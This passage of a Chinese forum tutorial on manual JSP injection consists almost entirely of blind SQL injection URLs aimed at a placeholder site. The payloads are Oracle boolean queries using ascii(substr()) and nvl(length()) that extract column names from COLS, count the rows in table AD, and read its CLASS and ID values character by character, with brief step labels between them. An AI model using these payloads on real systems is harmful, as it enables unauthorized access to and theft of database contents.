TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 81=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 81&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 76&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 74&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),2,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 82&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 86=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 86&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 84&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),3,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),4,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),4,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 87=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),4,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 87&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),4,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),4,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 85&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),4,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),4,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),5,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),5,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 87=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),5,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 87&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),5,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),5,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 85&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),5,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),5,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 74&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),5,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),5,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),6,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),6,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),6,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 85&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),6,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),6,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),7,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),7,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 86=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),7,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 86&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),7,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 88=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),7,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 88&gt;ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),7,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 89=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),7,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0&lt;=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=3)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 1&gt;=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=3)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 2&lt;=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=3)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 4&gt;=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM&lt;=3)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P> 
<P>第一个记录的第一位值为:</P>
<P><BR>4、 猜解数据值:</P>
<P> 数据值长度为一位:1<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0&lt;=nvl(length((SELECT COUNT(*)FROM AD)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 1&gt;=nvl(length((SELECT COUNT(*)FROM AD)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT COUNT(*)FROM AD)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0&gt;nvl(length((SELECT COUNT(*)FROM AD)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT COUNT(*)FROM AD)),0)</P>
<P> 数据长度为:9条记录<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT(*)FROM AD),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 52&gt;ascii(substr((SELECT COUNT(*)FROM AD),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 55=ascii(substr((SELECT COUNT(*)FROM AD),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 55&gt;ascii(substr((SELECT COUNT(*)FROM AD),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 56=ascii(substr((SELECT COUNT(*)FROM AD),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 56&gt;ascii(substr((SELECT COUNT(*)FROM AD),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 57=ascii(substr((SELECT COUNT(*)FROM AD),1,1))</P>
<P>以下猜解记录值<BR> 第一行第一列记录的长度为:1,值为:1<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0&lt;=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 1&gt;=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0&gt;nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 52&gt;ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))</P>
<P><BR> 第一行第一列记录的长度为:1,值为:2</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0&lt;=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 1&gt;=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0&gt;nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 52&gt;ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=1)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))</P>
<P><BR> 第二行第一列记录的长度为:1,值为:2<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0&lt;=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 1&gt;=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0&gt;nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 52&gt;ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 49&gt;ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 50=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))</P>
<P> 第二行第二列记录的长度为:1,值为:2</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0&lt;=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 1&gt;=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 0&gt;nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1)),0)</P>
<P>http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 52&gt;ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1))<BR>http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM&lt;=2)ORDER BY 2DESC)WHERE ROWNUM&lt;=1),1,1)) </P></FONT></DIV>
页: [1]
查看完整版本: 手工注射JSP学习